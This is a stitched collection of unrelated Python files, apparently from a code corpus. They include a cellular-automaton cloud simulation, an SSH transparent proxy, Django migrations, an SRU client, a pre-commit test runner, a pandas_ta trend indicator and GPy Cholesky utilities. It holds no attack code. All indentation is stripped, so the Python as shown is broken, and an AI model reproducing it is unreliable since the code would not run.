# #if(1*(layer/3) < k and k < 2*(layer/3)): #middle third
# randNum = random.randint(0,25)
# if(randNum <= 1):
# mat[i,j,k] = 1
# #matB[i,j,k] = 1
# else:
# randNum = random.randint(0,250)
# if(randNum <= 1):
# mat[i,j,k] = 1
def plantSeed(mat, numSeeds):
#put in the middle third of box
row, col, layer = mat.shape
for i in range(numSeeds):
rowRand = random.randint(2,row-2);
colRand = random.randint(2,col-2);
layerRand = random.randint(2,layer-2);
mat[rowRand,colRand,layerRand] = 1
def iterateForwardVector():
humCopy = hum.copy()
actCopy = act.copy()
cldCopy = cld.copy()
row, col, lay = hum.shape
hum[2:row-2, 2:col-2, 2:lay-2] = humCopy[2:row-2, 2:col-2, 2:lay-2] & (~ actCopy[2:row-2, 2:col-2, 2:lay-2])
cld[2:row-2, 2:col-2, 2:lay-2] = np.logical_or(cldCopy[2:row-2, 2:col-2, 2:lay-2] , actCopy[2:row-2, 2:col-2, 2:lay-2])
matR1 = np.roll(np.roll(act,-1,axis=0),1,axis=2) # mat[i+1,j,k-1]
matR2 = np.roll(np.roll(act,-1,axis=1),1,axis=2) # mat[i,j+1,k-1]
matR3 = np.roll(act,1,axis=2) # mat[i,j,k-1]
matR4 = np.roll(act,1,axis=0) # mat[i-1,j,k]
matR5 = np.roll(act,1,axis=1) # mat[i,j-1,k]
matR6 = np.roll(act,1,axis=2) # mat[i,j,k-1]
matR7 = np.roll(act,-2,axis=0) # mat[i+2,j,k]
matR8 = np.roll(act,-2,axis=1) # mat[i,j+2,k]
matR9 = np.roll(act,2,axis=0) # mat[i-2,j,k]
matR10 = np.roll(act,2,axis=1) # mat[i,j-2,k]
matR11 = np.roll(act,2,axis=2) # mat[i,j,k-2]
act[2:row-2, 2:col-2, 2:lay-2] = (~ actCopy[2:row-2, 2:col-2, 2:lay-2]) & humCopy[2:row-2, 2:col-2, 2:lay-2] & \
np.logical_or(matR1[2:row-2, 2:col-2, 2:lay-2],
np.logical_or(matR2[2:row-2, 2:col-2, 2:lay-2],
np.logical_or(matR3[2:row-2, 2:col-2, 2:lay-2],
np.logical_or(matR4[2:row-2, 2:col-2, 2:lay-2],
np.logical_or(matR5[2:row-2, 2:col-2, 2:lay-2],
np.logical_or(matR6[2:row-2, 2:col-2, 2:lay-2],
np.logical_or(matR7[2:row-2, 2:col-2, 2:lay-2],
np.logical_or(matR8[2:row-2, 2:col-2, 2:lay-2],
np.logical_or(matR9[2:row-2, 2:col-2, 2:lay-2],
np.logical_or(matR10[2:row-2, 2:col-2, 2:lay-2],matR11[2:row-2, 2:col-2, 2:lay-2]))))))))))
lenI = 60
lenJ = 60
lenK = 60
hum = np.zeros((lenI, lenJ, lenK))
act = np.zeros((lenI, lenJ, lenK))
cld = np.zeros((lenI, lenJ, lenK))
hum = hum.astype(int)
act = act.astype(int)
cld = cld.astype(int)
makeSeedRand(hum)
plantSeed(act,2)
indexesFinal = np.array([[1,2,3]])
sp2 = gl.GLScatterPlotItem(pos=indexesFinal,size=1.5,pxMode=False)
w.addItem(sp2)
def resetVars():
global hum, act, cld, indexesFinal
hum = np.zeros((lenI, lenJ, lenK))
act = np.zeros((lenI, lenJ, lenK))
cld = np.zeros((lenI, lenJ, lenK))
hum = hum.astype(int)
act = act.astype(int)
cld = cld.astype(int)
makeSeedRand(hum)
plantSeed(act,2)
indexesFinal = np.array([[1,2,3]])
totalIterations = 80
numIteration = 0
lastTime = time()
fps = None
def update():
global numIteration, indexesFinal, lastTime, fps
if(numIteration < totalIterations) :
sp2.setData(pos=indexesFinal)
indexes = np.where(cld==1)
indexesFinal = np.array([[indexes[0][i],indexes[1][i],indexes[2][i]] for i in range(len(indexes[0]))])
iterateForwardVector()
numIteration+=1
else:
resetVars()
numIteration = 0
now = time()
dt = now - lastTime
lastTime = now
if fps is None:
fps = 1.0/dt
else:
s = np.clip(dt*3., 0, 1)
fps = fps * (1-s) + (1.0/dt) * s
print('%0.2f fps' % fps)
t = QtCore.QTimer()
t.timeout.connect(update)
t.start(5)
## Start Qt event loop unless running in interactive mode.
if __name__ == '__main__':
import sys
if (sys.flags.interactive != 1) or not hasattr(QtCore, PYQT_VERSION):
QtGui.QApplication.instance().exec_()
|
import numpy as np
#differnt operation of numpy library
#ndim is a function which determin about the dimention of the array
#1 dimention array
a= np.array([1,2,3,4,5])
print(a.ndim)
#2 dimention array
a=np.array([(1,2,3),(1,6,5)])
print(a.ndim)
#printing the datatype of an array
a=np.array([("sandip","aditi"),("rakesh","cp")])
print(a.dtype)
print(a.size)
a=np.array([(1,23,44,5,6),(12,11,12,5,6)])
print(a.shape)
print(a.min())
print(a.sum())
a=np.linspace(1,3,5)
print(a)
a= np.linspace(1,3,10)
print(a)
a= np.array([(1,2,3,4,5),(2,4,5,6,7)])
print(a.shape)
print(a.sum(axis=0))
print(a.sum(axis=1))
|
import asyncio
import logging
import collections
import socket
import ctypes
from functools import partial
from . import constants
from .utils import detect_af
from .baselistener import BaseListener
BUFSIZE = constants.BUFSIZE
def detect_af(addr):
return socket.getaddrinfo(addr,
None,
socket.AF_UNSPEC,
0,
0,
socket.AI_NUMERICHOST)[0][0]
class sockaddr(ctypes.Structure):
_fields_ = [('sa_family', ctypes.c_uint16),
('sa_data', ctypes.c_char * 14),
]
class sockaddr_in(ctypes.Structure):
_fields_ = [('sin_family', ctypes.c_uint16),
('sin_port', ctypes.c_uint16),
('sin_addr', ctypes.c_uint32),
]
sockaddr_size = max(ctypes.sizeof(sockaddr_in), ctypes.sizeof(sockaddr))
class sockaddr_in6(ctypes.Structure):
_fields_ = [('sin6_family', ctypes.c_uint16),
('sin6_port', ctypes.c_uint16),
('sin6_flowinfo', ctypes.c_uint32),
('sin6_addr', ctypes.c_char * 16),
('sin6_scope_id', ctypes.c_uint32),
]
sockaddr6_size = ctypes.sizeof(sockaddr_in6)
def get_orig_dst(sock):
own_addr = sock.getsockname()[0]
own_af = detect_af(own_addr)
if own_af == socket.AF_INET:
buf = sock.getsockopt(socket.SOL_IP, constants.SO_ORIGINAL_DST, sockaddr_size)
sa = sockaddr_in.from_buffer_copy(buf)
addr = socket.ntohl(sa.sin_addr)
addr = str(addr >> 24) + '.' + str((addr >> 16) & 0xFF) + '.' + str((addr >> 8) & 0xFF) + '.' + str(addr & 0xFF)
port = socket.ntohs(sa.sin_port)
return addr, port
elif own_af == socket.AF_INET6:
buf = sock.getsockopt(constants.SOL_IPV6, constants.SO_ORIGINAL_DST, sockaddr6_size)
sa = sockaddr_in6.from_buffer_copy(buf)
addr = socket.inet_ntop(socket.AF_INET6, sa.sin6_addr)
port = socket.ntohs(sa.sin_port)
return addr, port
else:
raise RuntimeError("Unknown address family!")
class TransparentListener(BaseListener): # pylint: disable=too-many-instance-attributes
def __init__(self, *,
listen_address,
listen_port,
pool,
timeout=4,
loop=None):
self._loop = loop if loop is not None else asyncio.get_event_loop()
self._logger = logging.getLogger(self.__class__.__name__)
self._listen_address = listen_address
self._listen_port = listen_port
self._children = set()
self._server = None
self._pool = pool
self._timeout = timeout
async def stop(self):
self._server.close()
await self._server.wait_closed()
while self._children:
children = list(self._children)
self._children.clear()
self._logger.debug("Cancelling %d client handlers...",
len(children))
for task in children:
task.cancel()
await asyncio.wait(children)
# workaround for TCP server keeps spawning handlers for a while
# after wait_closed() completed
await asyncio.sleep(.5)
async def _pump(self, writer, reader):
while True:
data = await reader.read(BUFSIZE)
if not data:
break
writer.write(data)
await writer.drain()
async def handler(self, reader, writer):
peer_addr = writer.transport.get_extra_info('peername')
self._logger.info("Client %s connected", str(peer_addr))
dst_writer = None
try:
# Instead get dst addr from socket options
sock = writer.transport.get_extra_info('socket')
dst_addr, dst_port = get_orig_dst(sock)
self._logger.info("Client %s requested connection to %s:%s",
peer_addr, dst_addr, dst_port)
async with self._pool.borrow() as ssh_conn:
dst_reader, dst_writer = await asyncio.wait_for(
ssh_conn.open_connection(dst_addr, dst_port),
self._timeout)
t1 = asyncio.ensure_future(self._pump(writer, dst_reader))
t2 = asyncio.ensure_future(self._pump(dst_writer, reader))
try:
await asyncio.gather(t1, t2)
finally:
for t in (t1, t2):
if not t.done():
t.cancel()
while not t.done():
try:
await t
except asyncio.CancelledError:
pass
except asyncio.CancelledError: # pylint: disable=try-except-raise
raise
except Exception as exc: # pragma: no cover
self._logger.exception("Connection handler stopped with exception:"
" %s", str(exc))
finally:
self._logger.info("Client %s disconnected", str(peer_addr))
if dst_writer is not None:
dst_writer.close()
writer.close()
async def start(self):
def _spawn(reader, writer):
def task_cb(task, fut):
self._children.discard(task)
task = self._loop.create_task(self.handler(reader, writer))
self._children.add(task)
task.add_done_callback(partial(task_cb, task))
self._server = await asyncio.start_server(_spawn,
self._listen_address,
self._listen_port)
self._logger.info("Transparent Proxy server listening on %s:%d",
self._listen_address, self._listen_port)
async def __aenter__(self):
await self.start()
return self
async def __aexit__(self, exc_type, exc, tb):
await self.stop()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-05-24 03:41
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('frbb', '0007_userprofile_withdrawn'),
]
operations = [
migrations.AddField(
model_name='poem',
name='created',
field=models.DateTimeField(auto_now_add=True, default=datetime.datetime(2016, 5, 24, 3, 41, 34, 773855, tzinfo=utc)),
preserve_default=False,
),
migrations.AddField(
model_name='userprofile',
name='created',
field=models.DateTimeField(auto_now_add=True, default=datetime.datetime(2016, 5, 24, 3, 41, 41, 245833, tzinfo=utc)),
preserve_default=False,
),
migrations.AlterField(
model_name='userprofile',
name='balance',
field=models.IntegerField(default=5),
),
]
|
"""Test data_utils
"""
import pytest
from pytest import fixture
from kipoi.data import PreloadedDataset
import numpy as np
@fixture
def data():
return {"a": [np.arange(3)],
"b": {"d": np.arange(3)},
"c": np.arange(3).reshape((-1, 1))
}
@fixture
def bad_data():
return {"a": [np.arange(3)],
"b": {"d": np.arange(4)},
"c": np.arange(3).reshape((-1, 1)),
"e": 1
}
def test_preloaded_dataset(data):
def data_fn():
return data
d = PreloadedDataset.from_fn(data_fn)()
assert d.load_all() == data
assert len(d) == 3
assert d[1] == {"a": [1], "b": {"d": 1}, "c": np.array([1])}
assert list(d.batch_iter(2))[1] == {'a': [np.array([2])], 'b': {'d': np.array([2])}, 'c': np.array([[2]])}
|
import time, httplib, urllib2, socket
from lxml import etree
from lxml import objectify
class SruObject:
""" Abstract class for objectifying SRU XML
ZSI attrs: name, typecode
"""
tree = None
def __dir__(self):
attrlist = dir(self)
attrlist.extend(['name', 'typecode'])
attrlist.sort()
return attrlist
def __init__(self, node):
self.tree = node
def __getattr__(self, name):
# avoid command line repr wierdness
if name == '__repr__':
raise AttributeError
elif name == 'name':
return self.tag[self.tag.find('}')+1:]
elif name =='typecode':
return
return getattr(self.tree, name)
def __str__(self):
# return objectify.dump(self.tree)
return etree.tostring(self.tree)
#- end SruObject ----------------------------------------------------------
class SruRecord(SruObject):
""" Thin wrapper for records returned in SRU responses.
Note: Not the same as a Cheshire3 Record - although the recordData could be used to construct one...
ZSI attrs (additional): inline, recordData, recordPacking, recordPosition, recordSchema
"""
def __dir__(self):
attrlist = SruObject.__dir__(self)
attrlist.extend(['inline', 'recordData', 'recordPacking', 'recordPosition', 'recordSchema'])
attrlist.sort()
return attrlist
def __getattr__(self, name):
if name == 'recordData':
if self.recordPacking == 'string':
return SruRecordData(objectify.fromstring(str(self.tree.recordData)))
else:
# default: recordPacking == 'xml'
return SruRecordData(self.tree.recordData.getchildren()[0])
return SruObject.__getattr__(self, name)
#- end SruRecord ----------------------------------------------------------
class SruRecordData(SruObject):
def __dir__(self):
attrlist = SruObject.__dir__(self)
attrlist.extend(['toxml'])
attrlist.sort()
return attrlist
def __getattr__(self, name):
if name == 'id':
try:
return self.tree.attrib['id']
except KeyError:
pass
return SruObject.__getattr__(self, name)
def toxml(self):
return etree.tostring(self.tree)
#- end SruRecordData ------------------------------------------------------
class SruResponse(SruObject):
""" Abstract class for SRU responses
ZSI attrs (additional): diagnostics, extraResponseData, version
"""
def __dir__(self):
attrlist = SruObject.__dir__(self)
attrlist.extend(['diagnostics', 'extraResponseData', 'version'])
attrlist.sort()
return attrlist
def __getattr__(self, name):
if name == 'diagnostics':
try:
diags = SruObject.__getattr__(self, name)
return [ el for el in diags.iterchildren(tag='{http://www.loc.gov/zing/srw/diagnostic/}diagnostic') ]
except AttributeError:
return []
return SruObject.__getattr__(self, name)
#- end SruResponse --------------------------------------------------------
class ExplainResponse(SruResponse):
""" Thin wrapper for SRU Explain Response
ZSI attrs (additional): echoedExplainRequest, record
"""
def __dir__(self):
attrlist = SruResponse.__dir__(self)
attrlist.extend(['echoedExplainRequest', 'record'])
attrlist.sort()
return attrlist
def __getattr__(self, name):
if name == 'record':
return SruRecord(self.tree.record)
return SruResponse.__getattr__(self, name)
def __str__(self):
return objectify.dump(self.tree)
#return "%s:\n Version: %s\n Record (presence of): %i\n Diagnostics: %s\n ExtraResponseData: %s" % (self.__class__.__name__, self.version, self.record <> None, repr(self.diagnostics), repr(self.extraResponseData))
#- end ExplainResponse ----------------------------------------------------
class SearchRetrieveResponse(SruResponse):
""" Thin wrapper for SRU SearchRetrieve Response
ZSI attrs (additional): echoedSearchRetrieveRequest, numberOfRecords, records, nextRecordPosition, resultSetId, resultSetIdleTime
"""
def __dir__(self):
attrlist = SruResponse.__dir__(self)
attrlist.extend(['echoedSearchRetrieveRequest', 'nextRecordPosition', 'numberOfRecords', 'records', 'resultSetId', 'resultSetIdleTime'])
attrlist.sort()
return attrlist
def __getattr__(self, name):
if name == 'records':
try:
return [SruRecord(el) for el in self.tree.records.record]
except AttributeError:
return []
return SruResponse.__getattr__(self, name)
#- end SearchRetrieveResponse ---------------------------------------------
class ScanResponse(SruResponse):
""" Thin wrapper for SRU Scan Response
ZSI attrs (additional): echoedScanRequest, terms
"""
def __dir__(self):
attrlist = SruResponse.__dir__(self)
attrlist.extend(['echoedscanRequest', 'terms'])
attrlist.sort()
return attrlist
def __getattr__(self, name):
if name == 'terms':
try:
return [el for el in self.tree.terms.term]
except AttributeError:
return []
return SruResponse.__getattr__(self, name)
#- end ScanResponse -------------------------------------------------------
def fetch_data(myUrl, tries=1, timeout=20):
oldtimeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(timeout)
req = urllib2.Request(url=myUrl)
data = None
for x in range(tries):
try:
f = urllib2.urlopen(req)
except (urllib2.URLError):
# problem accessing remote service
continue
except httplib.BadStatusLine:
# response broken
time.sleep(0.5)
continue
else:
data = f.read()
f.close()
break
socket.setdefaulttimeout(oldtimeout)
return data
objectifier = objectify.makeparser(remove_blank_text=False)
# functions to fetch and return a parsed response object when given a URL
def get_explainResponse(url, tries=1, timeout=20):
data = fetch_data(url, tries=tries, timeout=timeout)
if data:
tree = objectify.fromstring(data, objectifier)
return ExplainResponse(tree)
def get_searchRetrieveResponse(url, tries=1, timeout=20):
data = fetch_data(url, tries=tries, timeout=timeout)
if data:
tree = objectify.fromstring(data, objectifier)
return SearchRetrieveResponse(tree)
def get_scanResponse(url, tries=1, timeout=20):
data = fetch_data(url, tries=tries, timeout=timeout)
if data:
tree = objectify.fromstring(data, objectifier)
return ScanResponse(tree)
|
# -*- coding: utf-8 -*-
from django.contrib import admin
from mptt.admin import MPTTModelAdmin
from mptt_graph.models import GraphModel, TreeNode
@admin.register(GraphModel)
class UrlTreeAdmin(admin.ModelAdmin):
list_display = ["title", "model_path", "model_pk"]
@admin.register(TreeNode)
class TreeNodeAdmin(MPTTModelAdmin):
mptt_level_indent = 30
|
class Grating:
"""A class that describing gratings. Sigma should be in lines/mm and the
units of the dimensions should be mm.
"""
def __init__(self, name='', spacing=600, order=1, height=100, width=100,
thickness=100, blaze=0, type='transmission'):
# define the variables that describe the grating
self.order = order
self.height = height
self.width = width
self.thickness = thickness
self.sigma = 1.0 / spacing
self.blaze = blaze
self.name = name
self.type = type
# set the sign for the grating equation
self.sign = 1
if self.type == 'transmission':
self.sign = -1
|
import argparse
import os
import subprocess
VENV_DIR = 'PRE_COMMIT_VENV'
def create_venv_dir():
"""
Create virtualenv for running unit tests
"""
SHELL_EXEC = []
SHELL_EXEC.append(F'set -e')
SHELL_EXEC.append(F'virtualenv {VENV_DIR}')
return_code = os.system(';'.join(SHELL_EXEC))
return return_code
def main(argv=None):
try:
# Create parser for argumentsx
parser = argparse.ArgumentParser()
parser.add_argument('filenames', nargs='*')
parser.add_argument('--testdir', type=str)
parser.add_argument('--managedir', type=str)
parser.add_argument('--requirements', type=str)
args = parser.parse_args(argv)
del args.filenames
# Ensure parameter files and directories exist
if not os.path.exists(args.testdir):
return F'Test directory path does not exist. Given directory: {args.testdir}'
if not os.path.exists(args.managedir):
return F'manage.py directory path does not exist. Given directory: ' + \
args.managedir
if not os.path.exists(args.requirements):
return F'Requirements directory path does not exist. Given directory: ' + \
args.requirements
# Check that virtualenv dir exists
if not os.path.exists(VENV_DIR):
return_code = create_venv_dir()
if return_code != 0:
return 'Could not create pre-commit virtual environment. ' + \
'Please ensure you have virtualenv installed and available. ' + \
'Install with: "pip install virtualenv"'
# Parse Directories from args
test_directory = args.testdir
manage_directory = args.managedir
manage_py_path = os.path.join(manage_directory, 'manage.py')
# Build shell command
SHELL_EXEC = []
v_env_activate = os.path.join(VENV_DIR, 'bin', 'activate')
SHELL_EXEC.append(F'set -e')
SHELL_EXEC.append(F'source {v_env_activate}')
SHELL_EXEC.append(F'pip install -r {args.requirements} --no-warn-conflicts')
SHELL_EXEC.append(F'python {manage_py_path} test {test_directory} --noinput')
return_code = os.system(';'.join(SHELL_EXEC))
if return_code != 0:
return 1
# Success
return 0
except Exception as e:
print(e.args[0])
return 1
if __file__ == 'main':
main()
|
# _*_ coding: utf-8 _*_
"""
@Date: 2021/5/2 4:08 下午
@Author: wz
@File: AssignCookies.py
@Decs:
"""
'''
question:
有一群孩子和一堆饼干,每个孩子有一个饥饿度,每个饼干都有一个大小。
每个孩子只能吃一个饼干,且只有饼干的大小不小于孩子的饥饿度时,这个孩子才能吃饱。求解最多有多少孩子可以吃饱。
example:
输入两个数组,分别代表孩子的饥饿度和饼干的大小。输出最多有多少孩子可以吃饱的数量。
Input: [1,2], [1,2,3]
Output: 2
'''
class Solution():
def __init__(self, children, cookies):
self.children, self.cookies = children, cookies
def find_content_children(self):
children = sorted(self.children)
cookies = sorted(self.cookies)
print("children:", children)
print("cookies: ", cookies)
# 这里的贪心体现为:为孩子都只分配最小的满足其饥饿度的cookie,直到cookies或children列表迭代完
child, cookie = 0, 0
while (child<len(children) and cookie<len(cookies)) :
if cookies[cookie]>=children[child]:
child += 1
cookie += 1
return child
if __name__ == "__main__":
children = [1,4,6,7,2,4,6,7,9,100]
cookies = [1,3,2,5,6,4,10]
solution = Solution(children, cookies)
print(solution.find_content_children())
|
from pdb import set_trace as T
import numpy as np
from matplotlib import pyplot as plt
import torch
from visualize import visualize, visGANGAN
from gan import SimpleGAN
gandir = 'data/gan/0/'
gangandir = 'data/gangan/'
fig = plt.figure(frameon=False)
#fig.set_size_inches(16, 4)
ax = plt.Axes(fig, [0., 0., 1., 1.])
ax.set_axis_off()
fig.add_axes(ax)
#GAN Figure
img = []
buf = 1+np.zeros((28*8, 2))
noise = torch.randn(64, 64).cuda()
for i in (0, 1, 10, 25, 27, 30, 32, 35, 40, 49):
params = torch.load(gandir+'model_'+str(i)+'.pt')
gan = SimpleGAN(28*28, zdim=64, hd=64, hg=64, lr=2e-4)
gan.load_state_dict(params)
gan = gan.cuda()
ary = visualize(gan, noise, show=False)
img.append(ary)
img1 = [img[0], buf, img[1], buf, img[2], buf, img[3], buf, img[4]]
hbuf = 1+np.zeros((2, 28*8*5+8))
img2 = [img[5], buf, img[6], buf, img[7], buf, img[8], buf, img[9]]
img = np.vstack([np.hstack(img1), hbuf, np.hstack(img2)])
ax.imshow(img)
#plt.show()
fig.savefig('gan_training.png', dpi=200, bbox_inches='tight')
#GAN-GAN Figure
gannoise = torch.randn(40, 64).cuda()
gangannoise = torch.Tensor(np.linspace(-2, 2, 32)).cuda().view(-1, 1)
params = torch.load(gangandir+'model_249.pt')
gangan = SimpleGAN(113745, zdim=1, hd=8, hg=64, lr=2e-4).cuda()
gangan.load_state_dict(params)
gangan = gangan.cuda()
gan = gangan.sample(gangannoise)
img = visGANGAN(gan, gannoise, show=False)
ax.imshow(img)
#plt.show()
fig.savefig('gangan_sample', dpi=200, bbox_inches='tight')
|
# -*- coding: utf-8 -*-
from pandas import DataFrame, Series
from pandas_ta.overlap import ema
from pandas_ta.utils import get_offset, non_zero_range, verify_series
def stc(close, tclength=None, fast=None, slow=None, factor=None, offset=None, **kwargs):
"""Indicator: Schaff Trend Cycle (STC)"""
# Validate arguments
tclength = int(tclength) if tclength and tclength > 0 else 10
fast = int(fast) if fast and fast > 0 else 12
slow = int(slow) if slow and slow > 0 else 26
factor = float(factor) if factor and factor > 0 else 0.5
if slow < fast: # mandatory condition, but might be confusing
fast, slow = slow, fast
_length = max(tclength, fast, slow)
close = verify_series(close, _length)
offset = get_offset(offset)
if close is None: return
# kwargs allows for three more series (ma1, ma2 and osc) which can be passed
# here ma1 and ma2 input negate internal ema calculations, osc substitutes
# both ma's.
ma1 = kwargs.pop("ma1", False)
ma2 = kwargs.pop("ma2", False)
osc = kwargs.pop("osc", False)
# 3 different modes of calculation..
if isinstance(ma1, Series) and isinstance(ma2, Series) and not osc:
ma1 = verify_series(ma1, _length)
ma2 = verify_series(ma2, _length)
if ma1 is None or ma2 is None: return
# Calculate Result based on external feeded series
xmacd = ma1 - ma2
# invoke shared calculation
pff, pf = schaff_tc(close, xmacd, tclength, factor)
elif isinstance(osc, Series):
osc = verify_series(osc, _length)
if osc is None: return
# Calculate Result based on feeded oscillator
# (should be ranging around 0 x-axis)
xmacd = osc
# invoke shared calculation
pff, pf = schaff_tc(close, xmacd, tclength, factor)
else:
# Calculate Result .. (traditionel/full)
# MACD line
fastma = ema(close, length=fast)
slowma = ema(close, length=slow)
xmacd = fastma - slowma
# invoke shared calculation
pff, pf = schaff_tc(close, xmacd, tclength, factor)
# Resulting Series
stc = Series(pff, index=close.index)
macd = Series(xmacd, index=close.index)
stoch = Series(pf, index=close.index)
# Offset
if offset != 0:
stc = stc.shift(offset)
macd = macd.shift(offset)
stoch = stoch.shift(offset)
# Handle fills
if "fillna" in kwargs:
stc.fillna(kwargs["fillna"], inplace=True)
macd.fillna(kwargs["fillna"], inplace=True)
stoch.fillna(kwargs["fillna"], inplace=True)
if "fill_method" in kwargs:
stc.fillna(method=kwargs["fill_method"], inplace=True)
macd.fillna(method=kwargs["fill_method"], inplace=True)
stoch.fillna(method=kwargs["fill_method"], inplace=True)
# Name and Categorize it
_props = f"_{tclength}_{fast}_{slow}_{factor}"
stc.name = f"STC{_props}"
macd.name = f"STCmacd{_props}"
stoch.name = f"STCstoch{_props}"
stc.category = macd.category = stoch.category ="momentum"
# Prepare DataFrame to return
data = {stc.name: stc, macd.name: macd, stoch.name: stoch}
df = DataFrame(data)
df.name = f"STC{_props}"
df.category = stc.category
return df
stc.__doc__ = \
"""Schaff Trend Cycle (STC)
The Schaff Trend Cycle is an evolution of the popular MACD incorportating two
cascaded stochastic calculations with additional smoothing.
The STC returns also the beginning MACD result as well as the result after the
first stochastic including its smoothing. This implementation has been extended
for Pandas TA to also allow for separatly feeding any other two moving Averages
(as ma1 and ma2) or to skip this to feed an oscillator (osc), based on which the
Schaff Trend Cycle should be calculated.
Feed external moving averages:
Internally calculation..
stc = ta.stc(close=df["close"], tclen=stc_tclen, fast=ma1_interval, slow=ma2_interval, factor=stc_factor)
becomes..
extMa1 = df.ta.zlma(close=df["close"], length=ma1_interval, append=True)
extMa2 = df.ta.ema(close=df["close"], length=ma2_interval, append=True)
stc = ta.stc(close=df["close"], tclen=stc_tclen, ma1=extMa1, ma2=extMa2, factor=stc_factor)
The same goes for osc=, which allows the input of an externally calculated oscillator, overriding ma1 & ma2.
Sources:
Implemented by rengel8 based on work found here:
https://www.prorealcode.com/prorealtime-indicators/schaff-trend-cycle2/
Calculation:
STCmacd = Moving Average Convergance/Divergance or Oscillator
STCstoch = Intermediate Stochastic of MACD/Osc.
2nd Stochastic including filtering with results in the
STC = Schaff Trend Cycle
Args:
close (pd.Series): Series of 'close's, used for indexing Series, mandatory
tclen (int): SchaffTC Signal-Line length. Default: 10 (adjust to the half of cycle)
fast (int): The short period. Default: 12
slow (int): The long period. Default: 26
factor (float): smoothing factor for last stoch. calculation. Default: 0.5
offset (int): How many periods to offset the result. Default: 0
Kwargs:
ma1: 1st moving average provided externally (mandatory in conjuction with ma2)
ma2: 2nd moving average provided externally (mandatory in conjuction with ma1)
osc: an externally feeded osillator
fillna (value, optional): pd.DataFrame.fillna(value)
fill_method (value, optional): Type of fill method
Returns:
pd.DataFrame: stc, macd, stoch
"""
def schaff_tc(close, xmacd, tclength, factor):
# ACTUAL Calculation part, which is shared between operation modes
# 1St : Stochastic of MACD
lowest_xmacd = xmacd.rolling(tclength).min() # min value in interval tclen
xmacd_range = non_zero_range(xmacd.rolling(tclength).max(), lowest_xmacd)
m = len(xmacd)
# %Fast K of MACD
stoch1, pf = list(xmacd), list(xmacd)
stoch1[0], pf[0] = 0, 0
for i in range(1, m):
if lowest_xmacd[i] > 0:
stoch1[i] = 100 * ((xmacd[i] - lowest_xmacd[i]) / xmacd_range[i])
else:
stoch1[i] = stoch1[i - 1]
# Smoothed Calculation for % Fast D of MACD
pf[i] = round(pf[i - 1] + (factor * (stoch1[i] - pf[i - 1])), 8)
pf = Series(pf, index=close.index)
# 2nd : Stochastic of smoothed Percent Fast D, 'PF', above
lowest_pf = pf.rolling(tclength).min()
pf_range = non_zero_range(pf.rolling(tclength).max(), lowest_pf)
# % of Fast K of PF
stoch2, pff = list(xmacd), list(xmacd)
stoch2[0], pff[0] = 0, 0
for i in range(1, m):
if pf_range[i] > 0:
stoch2[i] = 100 * ((pf[i] - lowest_pf[i]) / pf_range[i])
else:
stoch2[i] = stoch2[i - 1]
# Smoothed Calculation for % Fast D of PF
pff[i] = round(pff[i - 1] + (factor * (stoch2[i] - pff[i - 1])), 8)
return [pff, pf]
|
from django.contrib import admin
from . models import Message
# Register your models here.
admin.site.register(Message)
|
###############################################################
# Autogenerated module. Please don't modify. #
# Edit according file in protocol_generator/templates instead #
###############################################################
from typing import Dict
from ...structs.api.alter_replica_log_dirs_request import AlterReplicaLogDirsRequestData, LogDir, Topic
from ._main_serializers import ArraySerializer, ClassSerializer, Schema, int32Serializer, stringSerializer
topicSchemas: Dict[int, Schema] = {
0: [("topic", stringSerializer), ("partitions", ArraySerializer(int32Serializer))],
1: [("topic", stringSerializer), ("partitions", ArraySerializer(int32Serializer))],
}
topicSerializers: Dict[int, ClassSerializer[Topic]] = {
version: ClassSerializer(Topic, schema) for version, schema in topicSchemas.items()
}
topicSerializers[-1] = topicSerializers[1]
logDirSchemas: Dict[int, Schema] = {
0: [("log_dir", stringSerializer), ("topics", ArraySerializer(topicSerializers[0]))],
1: [("log_dir", stringSerializer), ("topics", ArraySerializer(topicSerializers[1]))],
}
logDirSerializers: Dict[int, ClassSerializer[LogDir]] = {
version: ClassSerializer(LogDir, schema) for version, schema in logDirSchemas.items()
}
logDirSerializers[-1] = logDirSerializers[1]
alterReplicaLogDirsRequestDataSchemas: Dict[int, Schema] = {
0: [("log_dirs", ArraySerializer(logDirSerializers[0]))],
1: [("log_dirs", ArraySerializer(logDirSerializers[1]))],
}
alterReplicaLogDirsRequestDataSerializers: Dict[int, ClassSerializer[AlterReplicaLogDirsRequestData]] = {
version: ClassSerializer(AlterReplicaLogDirsRequestData, schema)
for version, schema in alterReplicaLogDirsRequestDataSchemas.items()
}
alterReplicaLogDirsRequestDataSerializers[-1] = alterReplicaLogDirsRequestDataSerializers[1]
|
from .base import APIException
class ActivationFinishedException(APIException):
message = "ACTIVATION_ALREADY_FINISHED"
description = "number activation has already been completed"
def __init__(self, response):
super(ActivationFinishedException, self).__init__(description=self.description)
class ActivationNotExist(APIException):
message = "NO_ACTIVATION"
description = "this activation was not found"
def __init__(self, response):
super(ActivationNotExist, self).__init__(description=self.description)
|
# Copyright James Hensman and Max Zwiessele 2014, 2015
# Licensed under the BSD 3-clause license (see LICENSE.txt)
import numpy as np
from . import linalg
from .config import config
try:
from GPy_0_8_8.util import choleskies_cython
config.set('cython', 'working', 'True')
except ImportError:
config.set('cython', 'working', 'False')
def safe_root(N):
i = np.sqrt(N)
j = int(i)
if i != j:
raise ValueError("N is not square!")
return j
def _flat_to_triang_pure(flat_mat):
N, D = flat_mat.shape
M = (-1 + safe_root(8*N+1))//2
ret = np.zeros((D, M, M))
for d in range(D):
count = 0
for m in range(M):
for mm in range(m+1):
ret[d,m, mm] = flat_mat[count, d];
count = count+1
return ret
def _flat_to_triang_cython(flat_mat):
N, D = flat_mat.shape
M = (-1 + safe_root(8*N+1))//2
return choleskies_cython.flat_to_triang(flat_mat, M)
def _triang_to_flat_pure(L):
D, _, M = L.shape
N = M*(M+1)//2
flat = np.empty((N, D))
for d in range(D):
count = 0;
for m in range(M):
for mm in range(m+1):
flat[count,d] = L[d, m, mm]
count = count +1
return flat
def _triang_to_flat_cython(L):
return choleskies_cython.triang_to_flat(L)
def _backprop_gradient_pure(dL, L):
"""
Given the derivative of an objective fn with respect to the cholesky L,
compute the derivate with respect to the original matrix K, defined as
K = LL^T
where L was obtained by Cholesky decomposition
"""
dL_dK = np.tril(dL).copy()
N = L.shape[0]
for k in range(N - 1, -1, -1):
for j in range(k + 1, N):
for i in range(j, N):
dL_dK[i, k] -= dL_dK[i, j] * L[j, k]
